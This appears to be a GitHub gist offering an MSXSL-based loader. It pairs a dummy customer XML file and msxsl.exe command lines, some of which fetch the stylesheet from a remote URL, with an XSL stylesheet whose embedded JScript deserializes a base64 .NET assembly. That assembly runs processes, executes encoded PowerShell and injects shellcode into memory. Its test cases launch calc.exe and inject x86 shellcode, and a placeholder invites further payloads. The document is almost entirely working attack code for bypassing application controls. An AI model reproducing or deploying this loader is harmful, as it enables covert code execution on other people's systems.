Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
MSXSL Universal Shellcode / PowerShell execution
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>John Smith</name>
<address>123 Elm St.</address>
<phone>(123) 456-7890</phone>
</customer>
<customer>
<name>Mary Jones</name>
<address>456 Oak Ave.</address>
<phone>(156) 789-0123</phone>
</customer>
</customers>
1. start /b msxsl.exe customers.xml report.xsl
2. start /b msxsl.exe http://example.com/customers.xml report.xsl
3. start /b msxsl.exe customers.xml http://example.com/report.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABgAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAvY6bWQAAAAAA"+
"AAAA4AACIQsBCwAAEAAAAAYAAAAAAAA+LwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA5C4A"+
"AFcAAAAAQAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAABEDwAAACAAAAAQAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABA"+
"AAAABAAAABIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAWAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAACAvAAAAAAAASAAAAAIABQD0IQAA8AwAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKgIoBQAACgAA"+
"AComAAMoBgAACiYqAAAAGzACALkAAAABAAARACgHAAAKAygIAAAKbwkAAAoKKAoAAAoLB28LAAAK"+
"AAdzDAAACgwHbw0AAAoNCW8OAAAKBm8PAAAKAAlvDgAACnIBAABwbxAAAAoACW8RAAAKEwQHbxIA"+
"AAoAcxMAAAoTBQARBG8UAAAKEwgrFREIbxUAAAoTBgARBREGbxYAAAomABEIbxcAAAoTCREJLd7e"+
"FBEIFP4BEwkRCS0IEQhvGAAACgDcABEFbxkAAApvGgAAChMHKwARByoAAAABEAAAAgBrACaRABQA"+
"AAAAHgIoBQAACio6AAJ7DQAABG8HAAAGACoAEzAEAI8AAAACAAARcwoAAAYTBQADKAgAAAoKBhko"+
"HAAACgsSASgdAAAKDAYWCAaOaSgeAAAKABYNCAaOaR9AEgMoBQAABiYRBQjQAwAAAigfAAAKKCAA"+
"AAp0AwAAAn0NAAAEEQX+BgsAAAZzIQAACnMiAAAKEwQRBBZvIwAACgARBBdvJAAACgARBG8lAAAK"+
"ABEEbyYAAAoAACoAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAApAQAACN+AAAQ"+
"BQAANAYAACNTdHJpbmdzAAAAAEQLAAAYAAAAI1VTAFwLAAAQAAAAI0dVSUQAAABsCwAAhAEAACNC"+
"bG9iAAAAAAAAAAIAAAFXHQIcCQIAAAD6JTMAFgAAAQAAACcAAAAFAAAADQAAAAsAAAAMAAAAKQAA"+
"AAsAAAAGAAAAAgAAAAEAAAACAAAAAQAAAAEAAAAEAAAAAwAAAAAACgABAAAAAAAGAEUAPgAGAEwA"+
"PgAGAF4APgAGAJkAPgAGAKYAPgAGAOsBzAEGADYCFgIGAFYCFgIGAH4CzAEKAKUCkgIGAL8CswIG"+
"ANQCPgAOADsDFAMOAEsDFAMOAGgD9wIOAHcDFAMOAI8DFAMSANsDvAMOAOgD9wIGAPcDswIGANsD"+
"vAMGACAEBQQGAGIETwQGAHcEPgAGAJQEPgAGAKAEPgAGAN4EzAEGAOcEzAEGAA0FzAEGABoFPgAG"+
"AB8FPgAGAEMFPgAGAHsFagUGAIcFagUGAI4FagUGAMUFzAEGAOUFzAEGAAcGzAEGABkGFgIAAAAA"+
"AQAAAAAAAQABAAEAEAAYAAAABQABAAEAAgEAACIAAAAJAAEABgACAQAAKgAAAA0AAQAKAAMBEACz"+
"BAAABQANAAoABgbKADUAVoDSADgAVoDgADgAVoDuADgAVoD9ADgAVoAMATgAVoAZATgAVoArATgA"+
"VoBCATgAVoBZATgAVoBkATgAVoBxATgABgDGBAcBUCAAAAAAhhhjAAoAAQBbIAAAAACGAGkADgAB"+
"AGggAAAAAIYAdAATAAIAWCEAAAAAhgB6AA4AAwAAAAAAgACRIIMAGAAEAAAAAAADAIYYYwAhAAgA"+
"AAAAAAMAxgGSAAoACgAAAAAAAwDGAbQAJwAKAAAAAAADAMYBwAAvAAwAQCEAAAAAhhhjAAoADQBI"+
"IQAAAACGAM8ECgANAAAAAQCDAQAAAQCIAQAAAQCPAQAAAQCfAQAAAgCpAQAAAwCwAQIABAC9AQAA"+
"AQD4AQAAAgD/AQAAAQAGAgAAAgD4AQAAAQAPAjEAYwAKADkAYwBzAEEAYwAKAEkAYwB4AAkAYwAK"+
"AFEArQKDAFkAyAKJAGEA3AKOAFkA7QKUAGkAVAOjAHEAYwMKAHkAYwCoAHEAgAOuAIEAoQOzAIkA"+
"rgMOAIkAuAMOAIEAkgC4AHEA8QMKAKEAYwAKAAwALgTIABQAPATYAKEASATdALkAbgTjAMEAgwQK"+
"AAkAiwTnAMkAmwTnANEAYwAKANkA9AQLAdkA+gQTAekAFQUXAfEAMQUgAekATAUnAQkBYwAhABEB"+
"YwAwAREBnQU3AREBrwV4ABEBrQIKABEBwAUKACEBYwAOACkBYwBMATkBYwAKAAgACAA8AAgADABB"+
"AAgAEABGAAgAFABLAAgAGABQAAgAHABVAAgAIABaAAgAJABfAAgAKABkAAgALABpAAgAMABuAC4A"+
"EwBcAS4AGwBlAUMAIwB9AGMAQwFTAYAA2wA8AKMASwE8AOsAPgHYBcEA0QBAAQsAgwABAASAAAAA"+
"AAAAAAAAAAAAAAAAAHQCAAAEAAAAAAAAAAAAAAABADUAAAAAAAQAAAAAAAAAAAAAAAEAPgAAAAAA"+
"AQAAAAAAAAAAAAAAmgD3AgAAAAACAAAAAAAAAAAAAAABADUAAAAAAAMAAgAEAAIABQACAAAAADxN"+
"b2R1bGU+AHVuaXZlcnNhbC5kbGwAVGVzdENsYXNzAEppZ2dsaW4AUHJvdGVjdGlvbgBtc2Nvcmxp"+
"YgBTeXN0ZW0AT2JqZWN0AE11bHRpY2FzdERlbGVnYXRlAEVudW0ALmN0b3IAUnVuUHJvY2VzcwBS"+
"dW5QUwBpbmplY3RTQwBWaXJ0dWFsUHJvdGVjdABJbnZva2UASUFzeW5jUmVzdWx0AEFzeW5jQ2Fs"+
"bGJhY2sAQmVnaW5JbnZva2UARW5kSW52b2tlAHZhbHVlX18AUEFHRV9OT0FDQ0VTUwBQQUdFX1JF"+
"QURPTkxZAFBBR0VfUkVBRFdSSVRFAFBBR0VfV1JJVEVDT1BZAFBBR0VfRVhFQ1VURQBQQUdFX0VY"+
"RUNVVEVfUkVBRABQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBBR0VfRVhFQ1VURV9XUklURUNPUFkA"+
"UEFHRV9HVUFSRABQQUdFX05PQ0FDSEUAUEFHRV9XUklURUNPTUJJTkUAcGF0aABzdGFnZXIAYmFz"+
"ZTY0U2hlbGxjb2RlAGxwQWRkcmVzcwBkd1NpemUAZmxOZXdQcm90ZWN0AGxwZmxPbGRQcm90ZWN0"+
"AFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUAb2JqZWN0AG1ldGhv"+
"ZABjYWxsYmFjawByZXN1bHQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxh"+
"dGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHVu"+
"aXZlcnNhbABDb21WaXNpYmxlQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFN0"+
"YXJ0AFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9Vbmljb2RlAENvbnZlcnQARnJvbUJhc2U2NFN0"+
"cmluZwBHZXRTdHJpbmcAU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbgBTeXN0ZW0uTWFuYWdl"+
"bWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcwBSdW5zcGFjZUZhY3RvcnkAUnVuc3BhY2UAQ3JlYXRl"+
"UnVuc3BhY2UAT3BlbgBSdW5zcGFjZUludm9rZQBQaXBlbGluZQBDcmVhdGVQaXBlbGluZQBDb21t"+
"YW5kQ29sbGVjdGlvbgBnZXRfQ29tbWFuZHMAQWRkU2NyaXB0AEFkZABTeXN0ZW0uQ29sbGVjdGlv"+
"bnMuT2JqZWN0TW9kZWwAQ29sbGVjdGlvbmAxAFBTT2JqZWN0AENsb3NlAFN0cmluZ0J1aWxkZXIA"+
"U3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMASUVudW1lcmF0b3JgMQBHZXRFbnVtZXJhdG9yAGdl"+
"dF9DdXJyZW50AEFwcGVuZABTeXN0ZW0uQ29sbGVjdGlvbnMASUVudW1lcmF0b3IATW92ZU5leHQA"+
"SURpc3Bvc2FibGUARGlzcG9zZQBUb1N0cmluZwBTdHJpbmcAVHJpbQBNVEFUaHJlYWRBdHRyaWJ1"+
"dGUAPD5jX19EaXNwbGF5Q2xhc3MxAEZ1bmN0aW9uADxpbmplY3RTQz5iX18wAEdDSGFuZGxlAEdD"+
"SGFuZGxlVHlwZQBBbGxvYwBBZGRyT2ZQaW5uZWRPYmplY3QATWFyc2hhbABDb3B5AFR5cGUAUnVu"+
"dGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUARGVsZWdhdGUAR2V0RGVsZWdhdGVGb3JG"+
"dW5jdGlvblBvaW50ZXIAU3lzdGVtLlRocmVhZGluZwBUaHJlYWRTdGFydABUaHJlYWQAQXBhcnRt"+
"ZW50U3RhdGUAU2V0QXBhcnRtZW50U3RhdGUAc2V0X0lzQmFja2dyb3VuZABKb2luAERsbEltcG9y"+
"dEF0dHJpYnV0ZQBrZXJuZWwzMi5kbGwAVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyQXR0cmlidXRl"+
"AENhbGxpbmdDb252ZW50aW9uAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAAAVTwB1AHQALQBT"+
"AHQAcgBpAG4AZwABACCmQieA+V1HhiXsISsqFVkACLd6XFYZNOCJAyAAAQQgAQEOBCABDg4IAAQC"+
"GAkJEAkFIAIBHBgHIAISERIVHAUgAQESEQIGCAMGERAEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAA"+
"BCAAAAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABCABAQgEIAEBAgUBAAEAAAUAARIpDgQAABIt"+
"BQABHQUOBSABDh0FCDG/OFatNk41BAAAEjkFIAEBEjkEIAASQQQgABJFCCAAFRJJARJNBhUSVQES"+
"TQggABUSWQETAAYVElkBEk0EIAATAAUgARJRHAMgAAIDIAAOGwcKDhI5Ej0SQRUSVQESTRJREk0O"+
"FRJZARJNAgMGEgwHAAIRbRwRcQMgABgIAAQBHQUIGAgGAAESeRF9CAACEoCBGBJ5BiABARKAhQYg"+
"AQERgI0NBwYdBRFtGAkSgIkSFAYgAQERgJkIAQADAAAAAAAIAQAIAAAAAAAeAQABAFQCFldyYXBO"+
"b25FeGNlcHRpb25UaHJvd3MBDC8AAAAAAAAAAAAALi8AAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"ACAvAAAAAAAAAAAAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQ"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEA"+
"AQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBT"+
"AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8A"+
"AAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
"ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYA"+
"aQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABl"+
"AHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAA"+
"AAAwAC4AMAAuADAALgAwAAAAPAAOAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAAB1AG4AaQB2"+
"AGUAcgBzAGEAbAAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAA"+
"IAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAB1AG4AaQB2AGUAcgBz"+
"AGEAbAAuAGQAbABsAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAA"+
"LgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAu"+
"ADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAACAAAAwAAABAPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVj"+
"dGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
// INSERT YOUR CODE HERE
// Test Cases
o.RunProcess("calc.exe");
//Execute PowerShell Commands
WScript.Echo(o.RunPS("IAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwApACAA"));
// x86 Test Case - Calc
o.injectSC("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu+AdKgpoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA==");
} catch (e) {
debug(e.message);
}
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment